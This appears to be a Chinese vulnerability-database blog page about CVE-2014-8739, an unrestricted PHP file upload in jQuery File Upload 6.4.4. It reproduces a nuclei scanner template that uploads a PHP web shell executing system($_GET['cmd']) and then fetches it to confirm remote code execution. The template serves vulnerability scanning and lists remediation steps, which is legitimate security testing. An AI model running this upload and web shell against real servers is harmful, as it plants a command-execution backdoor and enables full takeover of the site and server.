jQuery File Upload 644 - Unrestricted File Upload

漏洞信息

漏洞名称: jQuery File Upload 6.4.4 - Unrestricted File Upload

漏洞编号:

  • CVE: CVE-2014-8739

漏洞类型: 文件上传

漏洞等级: 严重

漏洞描述: jQuery File Upload是一个广泛使用的文件上传插件,支持多种文件上传方式,常用于网站的文件上传功能。由于其易用性和灵活性,被许多网站采用。该插件在6.4.4版本中存在一个文件上传漏洞,由于server/php/UploadHandler.php文件缺乏对上传文件类型的验证,攻击者可以上传任意文件,包括PHP文件,从而导致远程代码执行。这一漏洞的根源在于未能正确验证上传文件的类型和扩展名,使得攻击者可以绕过预期的安全限制。成功利用此漏洞的攻击者可以上传恶意PHP文件,并在服务器上执行任意代码,这可能导致网站被完全控制,服务器数据泄露,甚至服务器被用作攻击其他系统的跳板。此漏洞的利用无需认证,且可以自动化执行,因此危害性极高。

产品厂商: jquery_file_upload_project

产品名称: jQuery File Upload

影响版本: 6.4.4

来源: https://github.com/projectdiscovery/nuclei-templates/blob/96aadf6e6be15f346a83713bd1cf0ba7e9cbf329/http%2Fcves%2F2014%2FCVE-2014-8739.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134

id: CVE-2014-8739

info:
  name: jQuery File Upload 6.4.4 - Unrestricted File Upload
  author: pranjal
  severity: critical
  description: jQuery File Upload Plugin 6.4.4 contains an unrestricted file upload caused by lack of validation in server/php/UploadHandler.php, letting remote attackers execute arbitrary PHP code by uploading PHP files, exploit requires uploading a PHP file with a PHP extension and accessing it directly.
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution by uploading malicious PHP files, potentially compromising the entire web application and server.
  remediation: |
    - Upgrade to a patched version of jQuery File Upload plugin
    - Implement proper file type validation on the server side
    - Restrict upload directories and file permissions
    - Use whitelist approach for allowed file extensions
  reference:
    - https://www.exploit-db.com/exploits/35057/
    - https://www.exploit-db.com/exploits/36811/
    - https://nvd.nist.gov/vuln/detail/CVE-2014-8739
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2014-8739
    cwe-id: CWE-434
    epss-score: 0.94326
    epss-percentile: 0.99943
    cpe: cpe:2.3:a:jquery_file_upload_project:jquery_file_upload:*:*:*:*:*:*:*:*
  metadata:
    max-request: 3
    vendor: jquery_file_upload_project
    product: jquery_file_upload
    verified: true
  tags: cve2014,cve,edb,jquery,file-upload,rce,kev

variables:
  randstr: "{{randstr}}"
  php_payload: |
    <?php
    echo "{{randstr}}";
    if(isset($_GET['cmd'])) {
        system($_GET['cmd']);
    }
    ?>

http:
  # Step 1: Check if the vulnerable endpoint exists
  - method: GET
    path:
      - "{{BaseURL}}/server/php/"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '^{\"files\":'
          - '"files":\s*\[\]'
        part: body
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: upload_url
        part: body
        regex:
          - '"url":\s*"([^"]+)"'
          - '"upload_url":\s*"([^"]+)"'

  # Step 2: Attempt to upload a PHP file
  - method: POST
    path:
      - "{{BaseURL}}/server/php/"

    headers:
      Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

    body: |
      ------WebKitFormBoundary{{randstr}}
      Content-Disposition: form-data; name="files[]"; filename="{{randstr}}.php"
      Content-Type: application/x-php

      {{php_payload}}
      ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - '"files":\s*\[[^\]]*"[^"]*{{randstr}}[^"]*"'
          - '"name":\s*"{{randstr}}\.php"'
          - '"error":\s*"File upload aborted"'
        part: body
        condition: or

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: uploaded_file
        part: body
        regex:
          - '"name":\s*"([^"]+)"'
          - '"url":\s*"([^"]+)"'

  # Step 3: Verify the uploaded file is accessible
  - method: GET
    path:
      - "{{BaseURL}}/server/php/files/{{randstr}}.php"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{randstr}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_output
        part: body
        regex:
          - '{{randstr}}'

# digest: 4a0a00473045022030d53b9152e1513c3423d7cdcb1b4d794cd54be61b903513a98849ef85a7a169022100bfb0a8e2682ffeb9d07fabd8b1a238debd4d25a1790fe0b672c7289916f12b56:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件上传
jQuery File Upload 644 - Unrestricted File Upload
http://example.com/2025/07/28/github_321537037/
作者
lianccc
发布于
2025年7月28日
许可协议